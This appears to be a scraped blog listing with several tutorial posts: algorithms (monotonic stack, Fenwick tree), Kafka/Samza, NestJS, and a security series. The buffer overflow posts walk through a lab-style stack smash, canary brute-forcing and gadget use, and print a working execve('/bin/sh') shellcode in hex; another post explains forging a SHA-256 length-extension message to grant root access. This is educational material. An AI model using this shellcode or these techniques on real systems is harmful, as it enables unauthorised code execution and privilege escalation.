The Aspires

An Introduction to Monotonic Stack

Ex10si0n Yan — Thu, 13 Jun 2024 20:58:11 GMT

A Monotonic Stack, as its name suggests, is a stack where all elements are maintained in a specific order: either ascending, descending, or based on user-defined comparable properties. The characteristic of this data structure is the maintenance of this order, which can save time on certain types of comparisons and improve the efficiency of some algorithms.

An Example

Given an array to be pushed into a monotonic descending stack, say this array is [5, 3, 1, 7, 6, 2]. The first three elements pushed into the stack are:

[buttom -> top
[5
[5 3
[5 3 1

And for the next one, 7, which is greater than the top of the stack (1), the stack will be popped until it meets one of the following conditions:

Stack is empty
Stack top is greater than the next element (7)

So the stack will iteratively be:

[5 3 1
[5 3
[5
[
[7

And then 6 is smaller than the top of the stack, so push it. So do the final element 2.

[7 6
[7 6 2

The property of this data structure is that the top of the stack must be the extremum value (either maximum or minimum)

Solving Problems

Here are some problems that you can solve using a monotonic stack. I will explain one of them, the Bad Hair Day. The second one, Trapping Rain Water, is an exercise for you.

POJ 3250 Bad Hair Day

One of the examples is "Bad Hair Day" from USACO 2006 November Silver (this link will redirect you to POJ.org).

POJ 3250 Bad Hair Day Description

$N$ cows standing from left to right, $h_i$ is the height of cow $i$. $c_i$ is the number of cows between cow $i$ and the first cow standing on the right of and taller than cow $i$. Determine the value of $\sum\limits_{i=1}^{N} c_i$.

To solve this problem, we can use a monotonic descending stack, accumulating the answer each time the stack pops. Say we have height = [10, 3, 7, 4, 12, 2] represents the height of each cow. After push two indices (not element) into the stack,

[0
[0 1

we meet a cow 3 (height of 7) which is greater than the top of stack, which means, the stack top cow 1 (height of 3) can see 0 (index of cow in height of 7 - index of the stack top - 1) cow. So we accumulate this value to answer (ans += 0), pop cow 1 (height of 3) until an empty stack or the stack top cow is taller than 7, and push cow 2 (height of 7). After that,

[0        ans += (i - stack.top() - 1), stack.pop()
[0 2
[0 2 3

When we meet cow 4 (height of 12), another cow that higher than the stack top cow 3 (height of 4). Cow 3 then can see 0 cow, cow 2 (height of 7) can see 1 cow, and cow 0 (height of 10) can see 3 cows. Let's break it up,

i = 4   # current cow index
top_idx = 3   # top index
c_3 = i - 3 - 1 = 0, then stack.pop(), ans += c_3, top_idx = 2
c_2 = i - 2 - 1 = 1, then stack.pop(), ans += c_2, top_idx = 0
c_0 = i - 0 - 1 = 3, then stack.pop(), ans += c_0, stack empty

Then push cow 4 and cow 5 (height of 12 and 2) into the stack,

[4
[4 5

When we reach the right-most cow, we push a cow that has infinite height, then we can calculate the number of cows that cow 4 and cow 5 can see.

i = 6
top_idx = 4
c_4 = i - 4 - 1, then stack.pop(), ans += c_4, top_idx = 5
c_5 = i - 5 - 1, then stack.pop(), ans += c_5, stack empty

Then push the infinite height cow into the stack (optional) as we return the final answer.

The code is shown in the following code block:

LeetCode 42 Trapping Rain Water

Another problem is LeetCode 42. You can try solving this problem yourself. The solution code is provided on GitHub Gist, so feel free to explore it.

trap.py

GitHub Gist: instantly share code, notes, and snippets.

Gist262588213843476

Buffer Overflow Attack from the Ground-up III: Canary

Ex10si0n Yan — Wed, 12 Jun 2024 17:56:22 GMT

In previous sections, we learned about buffer overflow attacks and the methods of injecting shell code. This post will introduce a simple protection mechanism against these attacks, as well as ways to bypass some specific canary protections.

Canary

A canary is a bit or some bits placed in the memory before the return address. If the canary has been modified, the program crashes rather than executing the following instructions. This acts as an integrity check to defend against buffer overflow attacks.

By-passing the Canary

In a buffer overflow attack, the philosophy is to change the memory content (especially the return address) by inputting well-constructed inputs. However, if the canary is fixed each time, it can be easily bypassed because an attacker can brute-force the canary bit by bit.

Say the canary is c4n4, at the position staring at the 129th bit after the buffer input point.

Brute Force Canary

We can construct an input of 129 bytes, where the last byte loops from ASCII 0 to 255. Since we did not modify the 130th, 131st, and 132nd bytes, there must be a value in the loop that does not make the program crash. This value is ‘c’, and from this, we know that the 129th byte is ‘c’.

The logic is, the program will not crash once in each loop, then we can get each bits of the canary.

Once we obtain the canary value, we can easily change the return address without altering the canary. Since we already know the canary value, it can be included in the input string.

The following diagram illustrates this action, after we crack the canary, we can change the return address.

The example code is shown in the following code block, the code tries to discover the canary byte by byte. For each byte position, it iterates through all possible byte values (0-255) until it finds the correct one that does not cause the program to crash, indicating the correct canary byte.

Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays

Ex10si0n Yan — Tue, 04 Jun 2024 23:18:41 GMT

Many years ago, I was a beginner in the Olympiad of Informatics. My friend @PremierBob taught me an incredible data structure that impressed me greatly: the Binary Indexed Tree, also known as the Fenwick Tree. It was a sunny afternoon at my high school.

He noticed that I was quite bored, so he decided to come over and talk to me about algorithms. We were both preparing for the OI, so I appreciated.

He said, “If there is an array and I want to query the sum of a specific range, how would you do that?”

“A for loop,” the thought came to my mind. But he didn’t expect such a simple answer, apparently. “While you are definitely expecting a smarter way to do this, I’d rather know your approach,” I responded.

He started to introduce how integers are stored in a computer.

An Integer in Memory

The way of storing a positive integer in a computer is very straightforward. It is binary. Consider the number 42; its binary representation is 101010. Mathematically defined. Representing a negative integer is also very simple: just take the 2’s complement of the positive number. For example, -42.

42                   : 00101010
1's complement       : 11010101
2's complement (-42) : 11010110

“So the 1’s complement is just bit-wise NOT, and 2’s complement is the 1’s complement plus one?” I asked.

“Definitely!” he said.

“Wait a sec,” I was so confused. “What does this have to do with a range sum query of an array?”

“Binary itself is the key to this approach. Let’s say the numbers from 1 to 16 are the index of an array, agreed?” he continued. “Just forget about 0 for now. If we just want the rightmost 1 (RM1) for these 16 numbers, what will that be?”

i: bin     RM1
1  0000001 0000001
2  0000010 0000010
3  0000011 0000001
4  0000100 0000100
5  0000101 0000001
6  0000110 0000010
7  0000111 0000001
8  0001000 0001000
9  0001001 0000001
10 0001010 0000010
11 0001011 0000001
12 0001100 0000100
13 0001101 0000001
14 0001110 0000010
15 0001111 0000001
16 0010000 0010000

“It is rarer to find the rightmost 1 on the higher digit than on the lower digit,” I responded. “And I know that the way of finding the rightmost 1 is bitwise AND for a number x with its negative value (-x).”

Find the Right Most 1 in a Binary

Simply calculate rm1 = x & -x and you will get that, see https://stackoverflow.com/questions/31393100/how-to-get-position-of-right-most-set-bit-in-c

“That’s right, and it also follows some patterns. Let’s take a look at the following graph.”

“A red box contains the sum of all blue lines that extend from it.” he said while drawing, "with the nature of numbers, we can define this rule"

We named the function of finding the right most 1 as lowbit, the function is defined in code:

Array c maintains the sum of range such that starting from x - lowbit(x) + 1 and end with x, inclusively.

A code snippet to describe this rule is: c[x] = sum(a[x - lowbit(x) + 1, ..., a[x])

The following figure shows an example of maintaining an array a = [1, 2, 7, 6, 3, 5, 4, 1]. The array c = [1, 3, 7, 16, 3, 8, 4, 29] represents sum of each intervals in [[1, 1], [1, 2], [3, 3], [1, 4], [5, 5], [5, 6], [7, 7], [1, 8]], which is defined as [[x - lowbit(x) + 1, x], ...].

“That is awesome!” I said. “And you can query the sum of an array by adding these interval sums in c. For example, if I want to calculate the sum of the range [3, 6] inclusive, I just need to determine c[6] + c[4] - c[2], rather than calculate a[3] + a[4] + a[5] + a[6]. For a more extreme example, if I want to calculate the sum of the range [1, 8], I just use c[8].”

“This approach can lower the time complexity of determining the sum of a range from $O(n)$ to $O(\log n)$. But it’s worth mentioning that this approach only supports range arithmetic operations that follow the associative law, such as addition (sum), multiplication (cumulative product), and exclusive OR, aka XOR,” he added.

The Python code for getting the sum of an interval starting from 1 and the interval from l to r is:

To initialize the tree, we need $O(n)$ of time, we can use a prefix sum array sum, to help us with the initialization, then you can use the get_sum or get_sum_interval to query range sum.

Prefix Sum Array

A Prefix Sum Array, also known as a cumulative sum array or cumulative frequency array, is an array where each element represents the sum of all elements up to that index in the original array.

For example, given an array arr = [1, 3, 5, 7, 9], its prefix sum array would be [1, 4, 9, 16, 25].

Time Complexity Optimization: Prefix Sum with HashMap

A very cool way of using Prefix Sum with Hash-map is shown in this post. I am going to break down this LeetCode 560 problem to reveal the idea of lowering down the time complexity by adopting Hash-map (or dictionary in Python).

The AspiresEx10si0n Yan

The code is shown as follow:

"That's is clear, and what about updating the value at index i in a, like a[i]?" I asked.

"I will introduce that to you next time~".

Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection

Ex10si0n Yan — Mon, 03 Jun 2024 18:47:16 GMT

Gadgets

A ransom note is created by cutting out letters or words from magazines or newspapers and pasting them together to form a message.

Ransom Note, Image from indieground.net

An assembly gadget is quite similar to this technique, a gadget is a small sequence of machine instructions ending with a ret (return) instruction. These gadgets are found in the program’s existing code and are used to execute specific operations. Attackers chain multiple gadgets together to perform complex actions, similar to forming a coherent message from cut-out words in a ransom note.

As an example, a jmp esp gadget can be found in assembly code, such as in <__libc_start_main@plt>, as shown in the following code block.

By extracting the highlight part, the assembly code can be reformed to be a different instruction.

8049131:       e8 aa ff ff ff   call   80490e0 <__libc_start_main@plt>
8049136:       f4               hlt
8049137:       8b 1c 24         mov    (%esp),%ebx
804913a:       c3               ret

The reformed instruction (starting from 0x8049135 and ending at 0x804913a) represents

8049135:       ff f4            push   esp
8049137:       8b 1c 24         mov    (%esp),%ebx
804913a:       c3               ret

Where, under the 32-bit x86 architecture, push esp pushes the current value of the ESP (Extended Stack Pointer) register onto the stack. While mov (%esp), %ebx is not necessary, and the gadget can finally return to ret address, which is equivalent to jmp esp, meaning the EIP (instruction counter) will go to the current top of the stack and execute the instructions found there.

Shellcode

A shellcode is a small piece of code used as the payload to be executed, after execution, a shell can be spawned for the process to interact. The term “shellcode” comes from its initial purpose of spawning a command shell, but it can be used to perform a variety of tasks, depending on the goals of the attacker.

The code from previous code block is a shell code, provided by Jean Pascal Pereira. ^[1]

Linux x86 execve("/bin/sh") - 28 bytes: http://0xffe4.org ↩︎

The assembly binary (inside char shellcode[]) is:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

Spawn a Shell

That will be very interesting if we can construct an input that overflows the buffer, overwrites the original return address with the gadget (so that the program executes the following instructions at the top of the stack), and places shellcode at the top of the stack that will spawn a shell for us, as shown in the following figure.

Stack Diagram

That sounds like a good plan. Let's use GDB to see what happens!

GDB debugging

The input point is shown in section C, as we inputed 10101234, stored at 0xffffd66c (indicated using red "input" and an arrow), and the ret is at 0xffffd70c (in red and blue double-block in section C). Section A shows the gadget and section B shows the original ret value 0x80492d5.

The shellcode is then inserted by user input right after the return address (yellow underline indicated that). The provided Python code is to implement the design, which saves the output in a file.

The Python program write a constructed string which is (some of the character are invisible):

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000051�Ph//shh/bin����°
                                                            ̀1�@̀

By inputing the file content to the vulnerable program, an interactive shell has been gained and the attacker can interact as current user (the process owner).

Shell Gained

Buffer Overflow Attack from the Ground-up I: Simple Overflow

Ex10si0n Yan — Mon, 03 Jun 2024 01:08:35 GMT

Stack and Heap

When a program is running, it is referred to as a process. Processes occupy a portion of the computer’s memory, where they store their code, data, and other necessary information required for execution.

In the context of memory management, heap and stack refer to different areas of a process’s memory, each with distinct purposes and characteristics:

How the stack works:

The stack is the reserved memory space for a process to execute. When a function is called, a block is reserved on the newest-end of the stack for local variables and some bookkeeping data.

Function Calls: When a function is called, a new block of memory is reserved on top of the stack. This block is used to store the function’s local variables and some additional information needed for the function to work.
Returning from Functions: When the function finishes, its block of memory is no longer needed. This block is freed up and can be reused the next time another function is called.
LIFO Order: The stack follows a last-in, first-out (LIFO) order. This means that the most recently reserved block of memory is always the first one to be freed.
Upside-down: The stack is upside-down, where a higher memory address is older and a lower memory address is newer.

How the heap works:

The heap is memory for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns ^[1], i.e., defining global variables.

https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap ↩︎

Stack-based Buffer Overflow

Unlike Python and Java, some of the built-in functions in C do not perform boundary checks when pushing data into an array (hence, no extra time cost for array manipulation).

As we mentioned before, local variables (including arrays, which are contiguous blocks of memory that can be accessed via a pointer to the first element) are stored on the stack. When a process is running, the stack grows and shrinks dynamically as functions are called and return. The stack pointer (ESP in x86 or RSP in x86-64) adjusts to allocate and deallocate stack space.

EBP (Extended Base Pointer)

When a function is called, the current value of the stack pointer (ESP) is typically saved in the base pointer (EBP), and the ESP is adjusted to allocate space for the function's stack frame, moving downwards (to lower) in memory.

This allows the function to access its parameters and local variables relative to a fixed reference point, even as the stack pointer changes during the function’s execution.

More explicitly, The space between ESP and EBP contains the local variables and possibly other data for the current function’s execution.

Stack Diagram

The return address is allocated at an important part of the stack. The return address is where the function returns after it is completely executed.

If the function is called by the main function, the return address should point to the place in the main function immediately after calling this function. If a function is called recursively, such as when an outer function calls an inner function, the return address of the inner function is the place immediately after the call instruction in the outer function, not the inner function itself. Therefore, some high-level programming languages impose a maximum recursion depth to prevent excessive allocation of stack space.

Let's take a look at the following example.

The code works like the catcommand in Linux, outputting whatever the user inputs. However, a buffer was declared inside the vuln() function without applying a boundary check. This enables attackers to overwrite the stack memory beyond the allocated buffer size.

Given the vuln() function’s buffer overflow vulnerability, an attacker could potentially:

Provide an input longer than 148 characters to overflow buf.
Overwrite the return address of vuln() to point to the win() function’s address.
When vuln() returns, instead of returning to the caller main, it would jump to the win() function, thereby executing the win() function and potentially printing the contents of “flag.txt”.

We need to disassembly the compiled binary, then we can easily check the memory address of the return address ret. Say the binary called vuln, the following command can print out the assembly code for vuln.

objdump -d ./vuln

The partial assembly code is shown as follow:

The ret address should be 0x8049390 since it is the bit right after calling vuln().

Then we need to use GDB to see what is happened when a user input a string, by setting the GDB break point to 0x80492f4, we can make the process stop after user input. Assume that inputting a non-sense characters 1010101012341234, the GDB should log as the previous code block shows.

(gdb) b *0x80492f4
Breakpoint 1 at 0x80492f4
(gdb) r
Starting program: /afs/andrew.cmu.edu/usr24/zhongboy/private/14741/b1/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter a string:

Breakpoint 1, 0x080492f4 in vuln ()
(gdb) nexti
1010101012341234
0x080492f9 in vuln ()

To see what happens inside the memory, use x/64xw $esp, which means display 64 units of memory formatting as hexadecimal word (4 bytes each) from the ESP pointer.

(gdb) x/64xw $esp
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322  0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231  0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728  0x08049390
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

As illustrated in the block, the ASCII code for the input 1010101012341234 is indicated using [...], which is in little-endian (reversed order).

Endianness - Wikipedia

Wikimedia Foundation, Inc.Contributors to Wikimedia projects

Endianness

Endianness refers to the order in which bytes are arranged in memory to represent larger data types (such as integers). There are two primary types of endianness:

Big-endian

In big-endian format, the most significant byte (the “big end”) is stored at the smallest memory address, and the least significant byte is stored at the largest memory address.

Little-endian

In little-endian format, the least significant byte (the “little end”) is stored at the smallest memory address, and the most significant byte is stored at the largest memory address.

The return address is indicated using (...).

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231] 0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728 (0x08049390)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

To overflow the buffer and overwrite the return address, we can construct an input string using Python (the code is shown as follows) to make the memory like this:

0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 [0x30313031
0xffffd670:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd680:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd690:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6a0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6b0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6c0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6d0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6e0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd6f0:   0x31313131  0x31313131  0x31313131  0x31313131
0xffffd700:   0x31313131  0x31313131  0x31313131 (0x08049256)
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760

The string in binary is: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V’

Bingo! When we input this 'evil' string (some characters may not show up) into the program, it will display the content of flag.txt.

An Introduction to SHA256 Hash Extension Attack

Ex10si0n Yan — Wed, 22 May 2024 04:02:43 GMT

TLDR; A SHA-256 extension attack can create a new hash value for a modified message without knowledge of the original message.

SHA-256 works by taking an input message and processing it through a series of flow operations to produce a fixed-size (256-bit) output, known as the hash value or digest. This output is typically represented as a 64-character hexadecimal number (each character represents 4 bits, ranging from 0x0000 to 0x1111), used to verify the integrity and authenticity of the input data.

If digital signatures are not used to protect the integrity of the SHA-256 hash value, an attacker can easily append additional data to an existing message (right after the original hash value) and generate a new valid hash value for the extended message without needing to know the original message content. This technique is known as a SHA-256 extension attack.

Here is an example: a system manager sends a YAML file with a SHA-256 digest to the server, and the server program can assign users specified in the YAML to the system.

The system is required to verify that the hash value of the received YAML is the same as the hash value from the sender's side in order to ensure integrity.

The system manager sends a YAML file contains:

The corresponding SHA-256 digest for this plain text is:

b3318b395ecbea550974e6558a782971262af8f786af4f01e8f8a2ba18bc1102

Charlie, the man-in-the-middle, can only write bytes to the YAML and read the digest. He can use an extension attack to modify the YAML (without reading it) and the hash to forge a modified YAML and the corresponding hash digest. He can then encapsulate the forged message and send it to the receiver to gain access privileges.

The following YAML has been modified by Charlie; he some characters to declare an access privilege, although he cannot see the message.

Charlie can generate the corresponding SHA-256 digest for the new message and then send it to the receiver to deceive them.

a40cf7232a3e7065cbab6d70a76328143b30a519ecca5a626b8b77f3c6c4924e

Charlie successfully exploit the server by modifying both YAML and the digest with the help of hash extension attack.

The following paragraphs will introduce you to the technique and implementation for the extension attack.

The SHA-256 Padding Algorithm

Before running into the hash algorithm, message should be padded to length by a multiple of 64 bytes. As an example, for the padding of the message helloworld.

The hexadecimal value (ASCII) for helloworld is

68 65 6c 6c 6f 77 6f 72 6c 64
^  ^  ^  ^  ^  ^  ^  ^  ^  ^
h  e  l  l  o  w  o  r  l  d
length = 10

The first step is to append a 0x80 to the hexadecimal value.

68 65 6c 6c 6f 77 6f 72 6c 64 80

The second step is to append many 0x00 until length equals to $n \times 64 - 8$, where $n > 0$.

68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00
                                 | count: 45 |
length = 56

The final step is to append 8 bytes as the length indicator of the original message ($10$ bytes = $80$ bits = $50_{16}$ bits).

68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00 80
                                 | count: 52 |
length = 64

SHA-256

The SHA-256 hash is a non-reversible hash function, which works by 8 hashing values ([h]), say h0, h1, ... to h7. The value of each [h] is initialized to a specific value. As illustrated in the Figure.

SHA-256

The padded message is then divided into n 64-byte blocks (n=3 in this example, where n depends on the length of the message), named [block1], [block2], and [block3]. The hash algorithm then processes each block sequentially, applying the compression function F to each block and updating the h values.

The code illustrates the compression function F. The final hash value is obtained by concatenating the eight h values after processing all blocks with the compression function. The initial h values are typically:

h0 = 0x6a09e667
h1 = 0xbb67ae85
h2 = 0x3c6ef372
h3 = 0xa54ff53a
h4 = 0x510e527f
h5 = 0x9b05688c
h6 = 0x1f83d9ab
h7 = 0x5be0cd19

These values go through the F function, and the function updates the h values (block-wise) with the block input, finally outputting the h values. These h values constitute the hash digest.

Merkle–Damgård Length Extension Attack

The Merkle–Damgård length extension attack forges a new message hash that is an extension of the original message. Since the output is the concatenation of h values, SHA-256 uses h values to feed into the algorithm and generate the hash digest.

The original message the system manager sent firstly goes through the SHA-256 hash algorithm and gets a hash value. This hash value is then used as the initial hash value for the extension message: , charlie, which is then processed by the SHA256 hash algorithm. A final hash value is then generated.

Mentioned that the original message is padded and appended with length follows the padding algorithm:

name: alice, bob<0x80><0x00>..<0x00>

Since there will be only one padding and length running into the hash function F, the original padding and length for the message "ends with bob" will be garbage characters. Therefore, we need to reconstruct the new padding and length through manual calculation in order to feed them into the hash function F.

Calculation of Length

The new length can be calculated using the previous length. We need to obtain the length of the previous message from metadata in order to calculate the new length accurately.

SHA-256

The message block to be fed into the extension F (right most) is:

name: alice, bob<0x80><0x00>..<0x00>, charlie<0x80><0x00>...<0x00>

where, alice, bob<0x80><0x00>..<0x00>, and charlie will be counted as three users to be added as the root user to the system.

In conclusion, a hash extension attack is a type of attack where an attacker is able to calculate the hash value of a longer message based on the hash value of a shorter message and some additional information. By exploiting the structure of certain hash functions, an attacker can append data to the original message and generate a valid hash value for the extended message without knowing the original message content. This type of attack highlights the importance of using secure hash functions that are resilient against such attacks.

An Introduction to Kafka and Samza for Stream Data Processing

Ex10si0n Yan — Sun, 14 Apr 2024 19:52:00 GMT

In which cases should we use Kafka and Samza?
By leveraging the scalability of a stream processing cluster, Kafka and Samza excel at handling high-volume and low-latency data streams. They are well-suited for processing real-time data collected by IoT devices or as a part of an OLAP system.

Kafka is a distributed event streaming platform that is used for building real-time data pipelines and streaming applications. It is commonly used for collecting, storing, and processing large amounts of data in real-time.

Kafka as a Messaging System

Kafka is a messaging system that allows different parts of a distributed system to communicate with each other. It follows a publish-subscribe pattern, where data producers publish messages without knowing how they will be used by the subscribers. This allows for decoupling between producers and consumers.

Consumers can express interest in specific types of data and receive only those messages. Kafka uses a commit log, which is an ordered and immutable data structure, to store and persist the data. However, as a user of Kafka, you don't need to worry about these technical details.

Broadly speaking, the main advantage of Kafka is that it provides a central data backbone for the organization. This means that all systems within the organization can independently and reliably consume data from Kafka. It helps in creating a unified and scalable data infrastructure.

Samza, on the other hand, is a stream processing framework that is built on top of Kafka. It provides a way to process data streams in real-time and is designed to handle high-volume and low-latency data processing. Samza allows developers to write custom processing logic using the Apache Kafka Streams API or the Apache Samza API.

Kafka the Publisher

There are many terms abstracted in Kafka. Topics are used to categorize messages, with producers publishing to topics and consumers subscribing and reading from topics. Topics are divided into Partitions, which represent units of parallelism and can be used for per-key processing. Brokers handle message persistence and replication, and Kafka uses Replication for fault-tolerance, choosing a leader and followers for each partition. If the leader fails, an alive follower becomes the new leader. This mechanism allows Kafka to tolerate failures.

The Publish-subscription Pattern

Pub/Sub provides a framework for exchanging messages between publishers (such as a news feed) and subscribers (such as a news reader)^[1]. Note that publishers don’t send messages to specific subscribers in a direct end-to-end manner. Instead, an intermediary is used - a Pub/Sub message broker, which groups messages into entities called channels (or topics). ^[2]

What is Pub/Sub? The Publish/Subscribe model explained https://ably.com/topic/pub-sub. ↩︎
Image is from Ably ↩︎

Sample Kafka Producer (Publisher) Code

The code defines a DataProducer class responsible for sending data to a Kafka topic. It reads a trace file line by line, parses each line into a JSON object, and determines the topic based on the "type" field. The data is then sent to the appropriate topic using Kafka's producer.send() method.

Samza the Subscriber

Samza is a distributed stream processing framework developed by LinkedIn, which is designed to continuously compute data as it becomes available and provides sub-second response times.

Like Kafka, there are also some terms in Samza, a Stream is made up of partitioned sequences of messages, similar to Kafka topics. Jobs in Samza are written using the API and can process data from one or more streams. Stateful stream processing is supported in Samza, where state is stored in an in-memory key-value (KV) store local to the machine running the task. This state is replicated to a changelog stream like Kafka for fault tolerance.

Samza APIs

Samza provides both a high-level Streams API and a low-level Task API for processing message streams.

High Level Steams API

The Streams API allows for operations like filtering, projection, repartitioning, joins, and windows on streams in a DAG (directed acyclic graph) format.

The code defines a class called "WikipediaFeedStreamTask" that implements the "StreamTask" interface. It processes incoming messages by converting them into a map and sends them to a Kafka output stream named "wikipedia-raw".

Low Level Task API:

The Task API allows for more specific processing on each data. Sample code at samza-hello-samza ^[1] project on GitHub

The sample code on GitHub repoistory at: https://github.com/apache/samza-hello-samza/blob/master/src/main/java/samza/examples/wikipedia/task/ ↩︎

The code is a Java class named WikipediaParserStreamTask that implements the StreamTask interface. It contains a process method that takes in an incoming message, parses it using a WikipediaParser, and sends the parsed result to an output stream. The main method generates some example strings and passes them to the WikipediaParser.parseLine method to demonstrate its functionality.

Explore the working of Samza

Apache Samza is often used alongside Apache YARN, which manages compute resources in clusters. Samza jobs are submitted to YARN, which allocates containers and runs Samza tasks. YARN handles resource allocation, scaling, and fault tolerance. Each task reads data from a partition in the 'dirty' topic, processes it, and produces the results to the 'clean' topic. Samza ensures fault tolerance by restarting failed tasks. This architecture allows for scalable, parallel processing with high availability for real-time data pipelines.

Explain Apache YARN to Beginners

Imagine you have a large cluster of computers working together to process big data. YARN is like the manager of this cluster. Its main job is to allocate the work and resources to each computer in the cluster.

Let's say you have multiple tasks to perform, like analyzing data, running calculations, or processing real-time streams. YARN takes these tasks and divides them into smaller units called containers. These containers represent pieces of work that can be executed on individual computers in the cluster.

YARN keeps track of all the available resources in the cluster, like memory and processing power. When a task needs to be performed, YARN checks the available resources and assigns a container to do the job. It makes sure that each container gets the required resources to complete the task efficiently.

YARN also monitors the health of the containers. If a container fails or stops working, YARN automatically restarts it on another computer, ensuring that the task continues without interruption. This helps in maintaining high availability and fault tolerance.

One important thing about YARN is its flexibility. It can work with different data processing applications or frameworks, like Apache Hadoop, Apache Spark, or Apache Samza. This means you can use YARN to run different kinds of big data jobs on the same cluster, making the most efficient use of your resources.

In summary, YARN is the cluster manager that allocates work to different computers, monitors their performance, automatically handles failures, and allows you to run various data processing tasks on a large scale. It makes big data processing more efficient, scalable, and reliable.

An Introduction of NestJS, a Node.js web/app server framework.

Ex10si0n Yan — Wed, 22 Nov 2023 03:59:00 GMT

Note that this post can be used as a complement of the official tutorial of Nest.js. I believe that official documents are best fit to learn a tech, so I recommend to take a step-by-step hands-on tutorial first from the following link.

Documentation | NestJS - A progressive Node.js framework

Nest is a framework for building efficient, scalable Node.js server-side applications. It uses progressive JavaScript, is built with TypeScript and combines elements of OOP (Object Oriented Programming), FP (Functional Programming), and FRP (Functional Reactive Programming).

Documentation | NestJS - A progressive Node.js framework

This post aims to explain basic concepts in back-end programming. Although NestJS is a Node.js (JavaScript) tech-stack, you will have a thorough understanding of many concepts of designing back-end/API programming (not specifically for Node.js) after reading this post.

Overall View

Before We Start: Boilerplate Code

Create a NestJS project using the Nest CLI tool, choose any package manager you like (I prefer yarn):

nest new hello-nest

In order to support Intellij IDEA/WebStorm, we need to apply the following configurations after opening the created project. In JetBrains IDE:

Click on the dropdown menu next to the Run/Debug configurations in the top-right corner of the IDE.
Select "Edit Configurations" or "Add Configuration" option. This will open the Run/Debug Configurations dialog.
Click the "+" button in the top-left corner of the dialog to add a new configuration.
Choose "Node.js" from the list of configurations.
In the "Name" field, provide a meaningful name for your configuration (e.g., "Nest.js").
In the "JavaScript file" field, enter the path to the Nest CLI file, typically node_modules/.bin/nest, or use the full path to the nest executable.
In the "Application parameters" field, enter the Nest.js CLI command you want to use, such as start for running your application.
Set the "Working directory" to the root folder (which will automatically generated by the IDE) of your Nest.js project.

FYI, you can follow the detailed Node.js configuration tutorial provided by JetBrains in the following link.

Running and debugging Node.js | IntelliJ IDEA

IntelliJ IDEA Help

Well done, you have configured the Run/Debug button. You can now simply click Run button to run the server.

The default port number of NestJS created by CLI is 3000. After you run the server, you can use your web browser to navigate to http://localhost:3000 and you can see the "Hello World!" message, which means a successfully run of NestJS.
